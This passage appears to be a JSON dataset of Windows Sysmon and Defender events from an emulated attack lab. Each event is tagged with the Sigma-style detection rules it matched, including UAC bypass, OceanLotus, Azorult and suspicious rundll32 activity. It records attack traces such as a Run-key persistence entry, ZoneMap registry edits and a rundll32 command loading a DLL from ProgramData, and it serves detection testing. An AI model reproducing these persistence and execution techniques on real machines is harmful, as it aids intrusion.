required","Category ID":"34","Category Name":"Tool","Detection ID":"{37522D93-EBDD-4A5B-93B6-E984C9E3FD38}","Detection Time":"2019-07-18T20:40:16.697Z","Detection User":"MSEDGEWIN10\\IEUser","Engine Version":"AM: 1.1.16100.4, NIS: 0.0.0.0","Error Code":"0x00000000","Error Description":"The operation completed successfully. ","Execution ID":"1","Execution Name":"%%813","FWLink":"https://go.microsoft.com/fwlink/?linkid=37020&name=HackTool:JS/Jsprat&threatid=2147708292&enterprise=0","Origin ID":"1","Origin Name":"%%845","Path":"containerfile:_C:\\AtomicRedTeam\\atomic-red-team-master\\atomics\\T1100\\shells\\b.jsp; file:_C:\\AtomicRedTeam\\atomic-red-team-master\\atomics\\T1100\\shells\\b.jsp->(SCRIPT0005); file:_C:\\AtomicRedTeam\\atomic-red-team-master\\atomics\\T1100\\shells\\b.jsp->(SCRIPT0037); file:_C:\\AtomicRedTeam\\atomic-red-team-master\\atomics\\T1100\\shells\\b.jsp->(SCRIPT0045); file:_C:\\AtomicRedTeam\\atomic-red-team-master\\atomics\\T1100\\shells\\b.jsp->(SCRIPT0065); file:_C:\\AtomicRedTeam\\atomic-red-team-master\\atomics\\T1100\\shells\\b.jsp->(SCRIPT0068)","Post Clean Status":"0","Pre Execution Status":"0","Process Name":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","Product Name":"%%827","Product Version":"4.18.1906.3","Remediation User":"","Severity ID":"4","Severity Name":"High","Signature Version":"AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 0.0.0.0","Source ID":"3","Source Name":"%%818","State":"1","Status Code":"1","Status Description":"","Threat ID":"2147708292","Threat Name":"HackTool:JS/Jsprat","Type ID":"8","Type Name":"%%862","Unused":"","Unused2":"","Unused3":"","Unused4":"","Unused5":"","Unused6":""},"System":{"Channel":"Microsoft-Windows-Windows 
Defender/Operational","Computer":"MSEDGEWIN10","Correlation":{"#attributes":{"ActivityID":"40013F0F-EF76-4940-A8B2-4DE50BE9AAC3"}},"EventID":1116,"EventRecordID":102,"Execution":{"#attributes":{"ProcessID":6024,"ThreadID":6068}},"Keywords":"0x8000000000000000","Level":3,"Opcode":0,"Provider":{"#attributes":{"Guid":"11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78","Name":"Microsoft-Windows-Windows Defender"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":0,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-18T20:51:50.798994Z"}},"Version":0}}}},{"detection":["Godmode Sigma Rule","OceanLotus Registry Activity","UAC Bypass via Event Viewer","New RUN Key Pointing to Suspicious Folder","Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"C:\\Users\\Public\\tools\\apt\\tendyron.exe","EventType":"SetValue","Image":"C:\\Users\\Public\\tools\\apt\\tendyron.exe","ProcessGuid":"747F3D96-4BCE-5F88-0000-001070544D00","ProcessId":2572,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Tendyron","UtcTime":"2020-10-15 13:17:02.706"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":416056,"Execution":{"#attributes":{"ProcessID":3368,"ThreadID":4748}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2020-10-15T13:17:02.736849Z"}},"Version":2}}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network 
Connections"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Company":"?","Description":"?","FileVersion":"?","Hashes":"SHA1=F359D3C074135BBCA9A4C98A6B6544690EDAE93D,MD5=02825976B19F123872914C233CF309BB,SHA256=0DD700BB6A992FFD40B0D2B41FC5875CD3B319A7079F67B3DC37428B5005B354,IMPHASH=45D79E943E6D34075123B434B5AE3DEB","Image":"C:\\Users\\Public\\tools\\apt\\tendyron.exe","ImageLoaded":"C:\\Users\\Public\\tools\\apt\\OnKeyToken_KEB.dll","OriginalFileName":"?","ProcessGuid":"747F3D96-4BCE-5F88-0000-001070544D00","ProcessId":2572,"Product":"?","RuleName":"","Signature":"","SignatureStatus":"Unavailable","Signed":"false","UtcTime":"2020-10-15 13:17:02.659"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":7,"EventRecordID":416061,"Execution":{"#attributes":{"ProcessID":3368,"ThreadID":4756}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":7,"TimeCreated":{"#attributes":{"SystemTime":"2020-10-15T13:17:02.963417Z"}},"Version":3}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File","Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2020-10-23 21:57:34.734","Image":"c:\\Users\\Public\\test.tmp","ProcessGuid":"747F3D96-51CD-5F93-0000-001073735B00","ProcessId":7624,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\tmp1375\\__tmp_rar_sfx_access_check_2914968","UtcTime":"2020-10-23 
21:57:34.734"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":423992,"Execution":{"#attributes":{"ProcessID":3208,"ThreadID":4804}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2020-10-23T21:57:34.745175Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File","Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2020-10-23 21:57:34.751","Image":"c:\\Users\\Public\\test.tmp","ProcessGuid":"747F3D96-51CD-5F93-0000-001073735B00","ProcessId":7624,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\tmp1375\\d948","UtcTime":"2020-10-23 21:57:34.751"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":423993,"Execution":{"#attributes":{"ProcessID":3208,"ThreadID":4804}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2020-10-23T21:57:34.767786Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using 
MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2020-10-23 21:22:14.491","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51D0-5F93-0000-001036A15B00","ProcessId":3396,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\sduchxll.tmp","UtcTime":"2020-10-23 21:57:36.328"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":424049,"Execution":{"#attributes":{"ProcessID":3208,"ThreadID":4804}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2020-10-23T21:57:36.332819Z"}},"Version":2}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"DWORD (0x00000001)","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51D0-5F93-0000-001036A15B00","ProcessId":3396,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass","UtcTime":"2020-10-23 
21:57:36.375"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424060,"Execution":{"#attributes":{"ProcessID":3208,"ThreadID":4804}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2020-10-23T21:57:36.375368Z"}},"Version":2}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"DWORD (0x00000001)","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51D0-5F93-0000-001036A15B00","ProcessId":3396,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName","UtcTime":"2020-10-23 21:57:36.375"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424061,"Execution":{"#attributes":{"ProcessID":3208,"ThreadID":4804}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2020-10-23T21:57:36.375422Z"}},"Version":2}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"DWORD 
(0x00000001)","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51D0-5F93-0000-001036A15B00","ProcessId":3396,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\UNCAsIntranet","UtcTime":"2020-10-23 21:57:36.375"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424062,"Execution":{"#attributes":{"ProcessID":3208,"ThreadID":4804}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2020-10-23T21:57:36.375487Z"}},"Version":2}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"DWORD (0x00000000)","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51D0-5F93-0000-001036A15B00","ProcessId":3396,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\AutoDetect","UtcTime":"2020-10-23 21:57:36.375"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424063,"Execution":{"#attributes":{"ProcessID":3208,"ThreadID":4804}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2020-10-23T21:57:36.375545Z"}},"Version":2}}}},{"detection":["OceanLotus Registry 
Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"DWORD (0x00000001)","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51D0-5F93-0000-001036A15B00","ProcessId":3396,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass","UtcTime":"2020-10-23 21:57:36.375"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424064,"Execution":{"#attributes":{"ProcessID":3208,"ThreadID":4804}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2020-10-23T21:57:36.376024Z"}},"Version":2}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"DWORD (0x00000001)","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51D0-5F93-0000-001036A15B00","ProcessId":3396,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName","UtcTime":"2020-10-23 
21:57:36.375"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424065,"Execution":{"#attributes":{"ProcessID":3208,"ThreadID":4804}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2020-10-23T21:57:36.376053Z"}},"Version":2}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"DWORD (0x00000001)","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51D0-5F93-0000-001036A15B00","ProcessId":3396,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\UNCAsIntranet","UtcTime":"2020-10-23 21:57:36.375"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424066,"Execution":{"#attributes":{"ProcessID":3208,"ThreadID":4804}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2020-10-23T21:57:36.376077Z"}},"Version":2}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"DWORD 
(0x00000000)","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51D0-5F93-0000-001036A15B00","ProcessId":3396,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\AutoDetect","UtcTime":"2020-10-23 21:57:36.375"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424067,"Execution":{"#attributes":{"ProcessID":3208,"ThreadID":4804}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2020-10-23T21:57:36.376099Z"}},"Version":2}}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"Binary Data","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51D0-5F93-0000-001036A15B00","ProcessId":3396,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\bam\\State\\UserSettings\\S-1-5-21-3461203602-4096304019-2269080069-1000\\\\Device\\HarddiskVolume1\\Windows\\SysWOW64\\rundll32.exe","UtcTime":"2020-10-23 21:57:36.406"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424078,"Execution":{"#attributes":{"ProcessID":3208,"ThreadID":4804}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2020-10-23T21:57:36.417723Z"}},"Version":2}}}},{"detection":["Suspicious Rundll32 
Activity"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"Rundll32.exe shell32.dll,Control_RunDLL C:\\PROGRA~3\\DATAUS~1.DLL 4624665222","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows host process (Rundll32)","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A","Image":"C:\\Windows\\System32\\rundll32.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-4690-5F93-0000-002019A60800","LogonId":"0x8a619","OriginalFileName":"RUNDLL32.EXE","ParentCommandLine":"?","ParentImage":"?","ParentProcessGuid":"00000000-0000-0000-0000-000000000000","ParentProcessId":1216,"ProcessGuid":"747F3D96-51F9-5F93-0000-001003125E00","ProcessId":7552,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-10-23 21:58:17.171"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":424081,"Execution":{"#attributes":{"ProcessID":3208,"ThreadID":4804}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2020-10-23T21:58:17.176847Z"}},"Version":5}}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"Binary 
Data","EventType":"SetValue","Image":"C:\\Windows\\system32\\Rundll32.exe","ProcessGuid":"747F3D96-51F9-5F93-0000-001003125E00","ProcessId":7552,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\bam\\State\\UserSettings\\S-1-5-21-3461203602-4096304019-2269080069-1000\\\\Device\\HarddiskVolume1\\Windows\\SysWOW64\\rundll32.exe","UtcTime":"2020-10-23 21:58:17.532"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424114,"Execution":{"#attributes":{"ProcessID":3208,"ThreadID":4804}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2020-10-23T21:58:17.542300Z"}},"Version":2}}}},{"detection":["Suspicious Call by Ordinal"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\SysWOW64\\rundll32.exe\" \"C:\\Windows\\SysWOW64\\shell32.dll\",#44 C:\\PROGRA~3\\DATAUS~1.DLL 4624665222","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows host process (Rundll32)","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-4690-5F93-0000-002019A60800","LogonId":"0x8a619","OriginalFileName":"RUNDLL32.EXE","ParentCommandLine":"Rundll32.exe shell32.dll,Control_RunDLL C:\\PROGRA~3\\DATAUS~1.DLL 
4624665222","ParentImage":"C:\\Windows\\System32\\rundll32.exe","ParentProcessGuid":"747F3D96-51F9-5F93-0000-001003125E00","ParentProcessId":7552,"ProcessGuid":"747F3D96-51F9-5F93-0000-0010551E5E00","ProcessId":9116,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-10-23 21:58:17.542"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":424115,"Execution":{"#attributes":{"ProcessID":3208,"ThreadID":4804}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2020-10-23T21:58:17.543407Z"}},"Version":5}}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"Binary Data","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51F9-5F93-0000-0010551E5E00","ProcessId":9116,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\bam\\State\\UserSettings\\S-1-5-21-3461203602-4096304019-2269080069-1000\\\\Device\\HarddiskVolume1\\Windows\\SysWOW64\\rundll32.exe","UtcTime":"2020-10-23 21:58:21.688"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424174,"Execution":{"#attributes":{"ProcessID":3208,"ThreadID":4804}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2020-10-23T21:58:21.693498Z"}},"Version":2}}}},{"detection":["OceanLotus Registry 
Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"DWORD (0x00000001)","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51FD-5F93-0000-00103B425E00","ProcessId":7504,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass","UtcTime":"2020-10-23 21:58:21.922"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424244,"Execution":{"#attributes":{"ProcessID":3208,"ThreadID":4804}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2020-10-23T21:58:21.930237Z"}},"Version":2}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"DWORD (0x00000001)","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51FD-5F93-0000-00103B425E00","ProcessId":7504,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName","UtcTime":"2020-10-23 
21:58:21.922"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424245,"Execution":{"#attributes":{"ProcessID":3208,"ThreadID":4804}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2020-10-23T21:58:21.930339Z"}},"Version":2}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"DWORD (0x00000001)","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51FD-5F93-0000-00103B425E00","ProcessId":7504,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\UNCAsIntranet","UtcTime":"2020-10-23 